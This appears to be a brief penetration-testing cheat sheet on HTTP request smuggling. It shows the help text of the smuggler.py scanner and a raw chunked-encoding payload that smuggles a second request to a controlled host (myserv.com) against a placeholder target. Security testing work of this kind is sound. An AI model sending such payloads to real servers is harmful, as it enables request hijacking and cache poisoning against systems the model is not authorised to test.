https://portswigger.net/web-security/request-smuggling
# Smuggler.py is a small tool used to test that
python smuggler.py -h
_
___ _ __ ___ _ _ __ _ __ _|| ___ _ __ _ __ _ _
/ __|'_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__||'_ \||||\__ \ ||||||_||(_||(_||| __/ | _ ||_)||_|||___/_||_||_|\__,_|\__, |\__, |_|\___|_|(_)| .__/ \__, ||___/ |___/ |_||___/
by @gwendallecoguic
usage: smuggler.py [-h][-a PATH][-d HEADER][-i TIMEOUT][-m METHOD][-o HOSTS][-s SCHEME][-t THREADS][-u URLS][-v VERBOSE]
optional arguments:
-h, --help show this help message and exit
-a PATH, --path PATH set paths list
-d HEADER, --header HEADER
custom headers
-i TIMEOUT, --timeout TIMEOUT
set timeout, default 10
-m METHOD, --method METHOD
set methods separated by comma, default: all
-o HOSTS, --hosts HOSTS
set host list (required or -u)
-s SCHEME, --scheme SCHEME
scheme to use, default: http,https
-t THREADS, --threads THREADS
threads, default 10
-u URLS, --urls URLS set url list (required or -o)
-v VERBOSE, --verbose VERBOSE
display output, 0=nothing, 1=only vulnerable, 2=all
requests, 3=requests+headers, 4=full debug, default: 1
Redirecting to Owned host
https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
# Request using Transfer-Encoding: chunked# Then, another request, toward controlled domain# You can use Burp Collaborator to prove it
POST /xxxx HTTP/1.1
Transfer-Encoding: chunked
Host: www.target.com
...
data
0
GET /somefile HTTP/1.1
Host: myserv.com
X-Ignore: X